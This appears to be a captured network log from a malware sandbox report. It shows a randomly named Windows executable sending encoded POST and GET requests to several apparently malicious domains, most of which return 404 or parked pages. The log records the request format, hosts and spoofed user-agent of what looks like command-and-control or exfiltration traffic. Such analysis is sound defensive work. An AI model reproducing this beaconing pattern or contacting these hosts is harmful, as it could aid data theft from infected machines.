                                                                                                                                                                                                                                                              42192.168.11.2049783176.57.64.10280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:00.775222063 CEST834OUTPOST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 53 45 51 75 62 50 6c 47 62 43 6e 69 33 6c 70 67 37 35 59 6a 64 34 41 76 59 4d 6a 72 78 50 66 63 66 47 6b 69 42 47 56 51 45 49 35 49 56 33 73 35 4e 32 61 4f 6f 43 64 4f 51 2f 4e 51 31 45 63 62 62 54 78 4b 42 30 53 49 63 49 6b 56 34 73 53 4c 39 6c 44 2f 74 45 6e 4a 43 2f 6c 42 66 4c 54 6c 6b 5a 6e 4d 67 56 30 41 32 71 78 30 4e 52 4c 63 76 55 2b 5a 64 44 54 77 46 6e 63 4f 48 30 34 48 4f 72 4d 6a 4c 6f 6f 35 5a 32 72 31 4d 6d 62 6b 4e 31 6d 31 56 72 77 38 6e 4c 56 4f 67 77 70 52 63 54 71 78 6d 4e 57 65 68 64 44 77 58 54 4b 39 4b 75 38 69 75 70 55 71 56 6d 74 61 4b 67 55 6f 35 79 5a 39 30 68 6b 42 41 4a 73 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=5RyFs6/ejjUoSEQubPlGbCni3lpg75Yjd4AvYMjrxPfcfGkiBGVQEI5IV3s5N2aOoCdOQ/NQ1EcbbTxKB0SIcIkV4sSL9lD/tEnJC/lBfLTlkZnMgV0A2qx0NRLcvU+ZdDTwFncOH04HOrMjLoo5Z2r1MmbkN1m1Vrw8nLVOgwpRcTqxmNWehdDwXTK9Ku8iupUqVmtaKgUo5yZ90hkBAJs=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:01.048105001 CEST1066INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=5mUOWJgRNxqEpNlA; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474000; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=2rXAhEpSnOUQn1VCBC4Z; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:00 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:00 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              43192.168.11.2049784176.57.64.10280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430509090 CEST2578OUTPOST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 53 45 51 75 62 50 6c 47 62 43 6e 69 33 6c 70 67 37 35 59 6a 64 34 41 76 59 4d 6a 72 78 4f 6e 63 65 30 73 69 41 68 4a 51 48 49 35 49 63 58 73 34 4e 32 61 70 6f 43 56 43 51 2f 78 71 31 43 41 62 61 78 4a 4b 47 46 53 49 48 34 6b 56 6b 63 53 47 67 31 44 71 74 45 58 56 43 37 35 42 66 4c 54 6c 6b 62 50 4d 6e 45 30 41 6c 36 78 33 64 42 4c 49 72 55 2b 6c 64 44 37 4b 46 6e 51 34 45 41 4d 48 4f 50 51 6a 4a 65 55 35 56 32 72 7a 4e 6d 62 73 4e 31 62 76 56 72 73 65 6e 49 4a 6b 67 7a 35 52 63 57 58 4a 38 38 32 4a 2f 73 2b 35 53 68 4b 52 4c 74 45 2b 73 37 63 31 54 47 6c 6d 49 6b 4d 46 2f 42 6b 78 70 30 6f 38 55 66 59 6c 4e 4b 41 45 44 63 4e 74 48 6d 39 64 6e 44 69 67 71 76 76 68 6b 30 41 74 30 65 38 59 5a 37 64 74 78 4f 41 49 61 75 5a 54 79 76 34 41 4d 42 58 38 58 6a 48 79 33 33 6c 4d 70 42 43 72 57 6a 38 79 4e 32 70 5a 42 51 47 41 44 53 30 7a 52 31 4c 33 7a 73 63 42 76 31 59 41 53 4e 48 46 63 48 36 4d 43 75 32 69 62 6a 58 49 64 4c 44 4b 45 70 30 57 49 6e 39 63 42 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=5RyFs6/ejjUoSEQubPlGbCni3lpg75Yjd4AvYMjrxOnce0siAhJQHI5IcXs4N2apoCVCQ/xq1CAbaxJKGFSIH4kVkcSGg1DqtEXVC75BfLTlkbPMnE0Al6x3dBLIrU+ldD7KFnQ4EAMHOPQjJeU5V2rzNmbsN1bvVrsenIJkgz5RcWXJ882J/s+5ShKRLtE+s7c1TGlmIkMF/Bkxp0o8UfYlNKAEDcNtHm9dnDigqvvhk0At0e8YZ7dtxOAIauZTyv4AMBX8XjHy33lMpBCrWj8yN2pZBQGADS0zR1L3zscBv1YASNHFcH6MCu2ibjXIdLDKEp0WIn9cBA8MqWMGE13ZrmewO2Eoixf0Q5Ol0/Nb4REQzhnxYmot7kVVQVQOwYV+UReynBZvFOkUEcE6BhUYe9+DEzetYAdcOTVPwtPdMUpovzx0EDYEmExSB1867No7ipJclRATJYpm2J4CZskr0M9vM2C5gFWk47BqBiWxMyCYq/qJJmMXcWMzY9mS9D4QyaagNOwOxFSddbOVQa3MEXE1yxvDqJ+C4zUNmo91GqIfwCZWH/Q2hbASqamqg5eSfxGO0yw94v3wiifPJtbRfNlq9v/zdW756BOqGjUuEgkCxXV/cW1iwxpDuDcBSRYr7aZeo2BWjGk4uohqxRUAfzRMgyTSZ4pX5Dy1jZknHcY8jxSbiUc20RYUQDCBUF8treFYS4dqu9/WS5UFHwSVgXTSyikoS+74/HetW54aW6xv34urB8WCJF45WSAR4MsCqBJ3J6aGatATGzhXasXsVIWTZ3dX8W2T+N0bO5gsCgvN9VM9+7y/9FGmPzbVeKkXaCyKUXX5NbUtwYeXTdBG1Ia31dI93Gwwg0zIyU/exp1lKqhqLhrDMJ+KHVsTLKnoX5MNGNvjbrre28/7Y/ZqdYf2OH0dh1t+mUE1VmOuMKhFqkRocA466uzArV0APGtkHD/gptD7rbZBdoIfgGQKn14b47++cJnh7pWN9mRcLtI [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.430572987 CEST5405OUTData Raw: 59 58 64 69 36 4b 75 75 35 64 45 7a 71 6b 48 78 6d 67 50 36 37 64 7a 6f 4b 4a 38 36 79 45 34 67 69 46 33 46 5a 6e 58 69 55 38 43 57 47 2b 69 50 73 61 62 6e 48 34 37 67 76 4e 56 6b 55 48 59 51 64 54 52 73 46 51 76 47 38 45 70 39 37 39 52 4e 37 67
                                                                                                                                                                                                                                                              Data Ascii: YXdi6Kuu5dEzqkHxmgP67dzoKJ86yE4giF3FZnXiU8CWG+iPsabnH47gvNVkUHYQdTRsFQvG8Ep979RN7ghUn2orwMTvVC5BATDCRv+wVOx4NhcErPzN9I9+51wuHcw/G8OHZVAuYoNLkdJMjsSryEgsKOB8yTUNy0jdf9eBXvAVRZj5cf3U1Tgu9z7mLmdWHMD3t3Af/m0YqV7EP88HJLFi5jza8WVuLR0o7uPqhsEHrEfoICM
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:03.694143057 CEST1066INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=hG4kKGcqtMixKh4C; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474003; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=dQ6dBoD8cDhAPpTjSd6I; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:03 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:03 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              44192.168.11.2049785176.57.64.10280
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.085262060 CEST550OUTGET /mktg/?9B6h=0TalvP/u8kBxCEcVC8ZYLDfWzg1d8ZMLdJUcZNeUjcCfUnJGBGp8dbleblgtUVXijVAfatBw5nkrSCpMHneIWtcqoMWdglrJlT3qBoY6Uu70toyjn3om774=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348920107 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=g1KJrCKAbyTfnKRz; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728474006; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=nhkafp7zj4SxosVkXiVL; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:06 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:06 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 738
                                                                                                                                                                                                                                                              Last-Modified: Tue, 27 Aug 2024 08:59:13 GMT
                                                                                                                                                                                                                                                              ETag: "2e2-620a674a57ae6"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:06.348932028 CEST175INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 20 50 61 67
                                                                                                                                                                                                                                                              Data Ascii: > <br> <br> <b>404 Page not found</b> </td> </tr> </table> </body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              45192.168.11.2049794199.59.243.22780
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.636502981 CEST558OUTGET /enra/?FlS=3ldH5dkH-dBLf&9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739375114 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:40:41 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: f6169c14-8aa0-403d-80e9-03edbe4a29b5
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==
                                                                                                                                                                                                                                                              set-cookie: parking_session=f6169c14-8aa0-403d-80e9-03edbe4a29b5; expires=Wed, 09 Oct 2024 11:55:41 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6f 42 56 45 58 64 68 73 42 43 44 44 78 6c 30 44 30 59 4c 78 6d 48 43 42 49 4a 39 6d 37 33 39 62 46 55 67 33 42 54 34 6e 48 33 50 6c 4b 7a 34 64 78 4b 6d 54 70 78 7a 37 42 6e 39 62 38 59 48 39 58 6a 69 7a 52 64 41 4e 35 42 68 72 73 2b 4e 6f 55 41 70 47 67 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_oBVEXdhsBCDDxl0D0YLxmHCBIJ9m739bFUg3BT4nH3PlKz4dxKmTpxz7Bn9b8YH9XjizRdAN5Bhrs+NoUApGgQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:41.739388943 CEST886INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjYxNjljMTQtOGFhMC00MDNkLTgwZTktMDNlZGJlNGEyOWI1IiwicGFnZV90aW1lIjoxNzI4NDc0MDQxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              46192.168.11.2049795103.247.8.5380
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.141407013 CEST832OUTPOST /21hf/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.asa-malukuutara.com/21hf/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 6b 33 6c 72 53 2f 54 35 54 32 79 36 31 58 37 4c 61 69 54 6b 6b 6c 53 4c 43 52 35 68 63 4b 2f 46 54 61 30 6e 76 50 71 6b 6c 63 6a 50 37 41 45 58 44 77 75 52 73 75 78 35 51 31 6e 65 71 42 58 58 68 45 4f 51 54 4d 47 58 46 61 37 4c 36 51 50 45 42 4d 6c 36 33 51 56 35 77 6b 4b 59 74 58 41 77 76 4a 5a 61 34 39 37 71 6e 50 6a 49 31 58 6d 32 55 71 6e 45 31 4c 75 6a 34 56 66 54 55 68 48 6b 7a 61 50 72 42 37 4b 46 56 76 67 64 6f 7a 68 2b 67 6f 77 39 63 54 59 76 5a 53 5a 5a 31 34 62 69 73 2b 6c 62 62 49 33 51 77 78 68 5a 32 36 46 42 4c 35 43 49 70 6d 44 4f 4f 79 75 65 4e 35 56 77 4f 41 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=k3lrS/T5T2y61X7LaiTkklSLCR5hcK/FTa0nvPqklcjP7AEXDwuRsux5Q1neqBXXhEOQTMGXFa7L6QPEBMl63QV5wkKYtXAwvJZa497qnPjI1Xm2UqnE1Luj4VfTUhHkzaPrB7KFVvgdozh+gow9cTYvZSZZ14bis+lbbI3QwxhZ26FBL5CIpmDOOyueN5VwOA==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:48.716856956 CEST1289INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:48 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"
